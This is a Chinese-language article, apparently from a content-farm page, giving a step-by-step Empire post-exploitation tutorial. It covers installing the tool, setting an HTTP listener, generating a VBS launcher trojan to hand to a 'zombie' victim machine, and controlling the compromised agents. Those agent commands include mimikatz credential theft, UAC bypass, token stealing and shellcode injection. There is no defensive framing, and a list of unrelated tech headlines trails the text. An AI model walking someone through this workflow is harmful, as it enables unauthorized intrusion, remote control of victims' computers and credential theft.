我的天,内网渗透,大黑客是这样进行操作的
1、Empire工具介绍Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器 , 它建立在密码学、安全通信和灵活的架构之上 。 Empire实现了无需powershell.exe就可运行PowerShell代理的功能 。 快速部署后期漏洞利用模块 , 从键盘记录器到Mimikatz , 并且能够适应通信躲避网络检测 , 所有的这些功能都封装在一个以实用性为重点的框架中
2、Empire工具安装虽然渗透的目标是windows , 但Empire本身应该是运行在linux平台的 , 首先把程序目录下载下来:
git clone EmpireProject/Empire
接着就转进”Empire/setup”目录 , 安装./install.sh 。
sudo ./install.sh
3、Empire工具的攻击利用执行 sudo ./empire #执行工具操作
文章插图
执行 listeners #进入监听列表
文章插图
如果出现[!] Invalid listener name 那么先执行 uselistener http 选择http模块 再执行info 即可 ,跳出就back
文章插图
直接命令
set Name hacker
set Host
设置完之后:
文章插图
然后执行: run #运行监听 。运行监听之后生成木马 。如果没有run 命令就用 execute 取代run命令
文章插图
执行:usestager 空格 然后Tab按键 会出现
bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy
Windows 就选择 launcher_bat launcher_vbs 等 。。PHP 就选择 hop_php
比如我选择: launcher_vbs
执行:usestager launcher_vbs 监听列表的名字 #这里就是hacker, hacker就是我刚刚设置的监听列表名字 (set Listener hacker)
然后执行:info 查看设置配置 , 木马脚本放在了 /tmp/launcher.vbs
文章插图
然后执行:execute #运行 生成木马 , 生成成功 然后执行: sudo chmod 777 /tmp/launcher.vbs #赋予可读可写权限 然后丢给肉鸡运行
文章插图
生成成功
文章插图
然后查看肉鸡列表 执行命令: agents PS:如果你exit了 也就是退出了 你也可以直接执行agents命令查看肉鸡列表
文章插图
如果要控制肉鸡的话:
就执行: interact 肉鸡的名字
文章插图
进入之后 执行帮助 help 查看 肉鸡控制器的命令
agents 跳跃的代理人的菜单
back 返回菜单
bypassuac 运行bypassuac , 开创一个新的高完整性为监听代理 。 产卵<监听器>
clear 清除代理任务 。
creds 从数据库显示/返回凭证 。
download 任务代理下载文件
exit 任务代理退出
help 显示菜单或语法for the help特定的命令 。
info 显示有关此代理的信息
injectshellcode listener shellcode inject进入偏远的过程 。 前listener米 。 injectshellcode<><>_ PID
jobs 返回工作或杀死一个正在运行的工作
kill 任务杀死特定进程名称或ID.的代理
killdate 获取或设置一个代理的killdate(01 / 01 / 2016) 。
list 列出所有活动代理(或侦听器)
listeners 跳转到监听器菜单
lostlimit 任务代理更改丢失代理检测的限制
main 回到主菜单
mimikatz 运行在客户端- mimikatz Invoke
psinject inject发射器向远程进程 。 例如 , psinject > <名> < PID
pth 执行一个credid PTH通过Mimikatz 。
rename 重命名代理
revtoself 使用凭证/令牌还原令牌权限 。
sc 需要截图 , 默认是PNG 。 给一个比率意味着使用JPEG 。 例SC [ 1 ]
scriptcmd 执行在目前进口PowerShell脚本函数 。
scriptimport 进口的PowerShell脚本保存在存储器中的代理 。
searchmodule 模块搜索帝国名称/描述 。
shell 使用shell命令的代理任务 。
sleep 任务代理睡眠间隔[抖动]
spawn 对于给定的听众产生一个新的帝国代理名称 。 产卵<监听器>
steal_token 使用凭据/代币冒充一个令牌的进程ID 。
sysinfo 任务获取系统信息的代理
updateprofile 更新代理连接配置文件
upload 任务代理上传文件
- 人民币|天猫国际新增“服务大类”,知舟集团提醒入驻这些类目的要注意
- 当初|这是我的第一部华为手机,当初花6799元买的,现在“一文不值”?
- “天河优创”放榜
- 快的秒回,慢的等了近一天
- 联盟|天津半导体集成电路人才联盟成立
- 大叔|大叔买电脑被坑惨了,电脑三天两头出问题,老板:组装电脑容易坏!
- 展开|天地在线联合腾讯广告在京展开“附近推” 构建黄金5公里营销体系
- 好友聊天|《QQ》能量值计算规则
- 骁龙|中兴天机Axon 20 5G 至尊版发布:屏下镜头 搭载骁龙765G
- 天玑|天玑800U处理器加持的RedmiNote9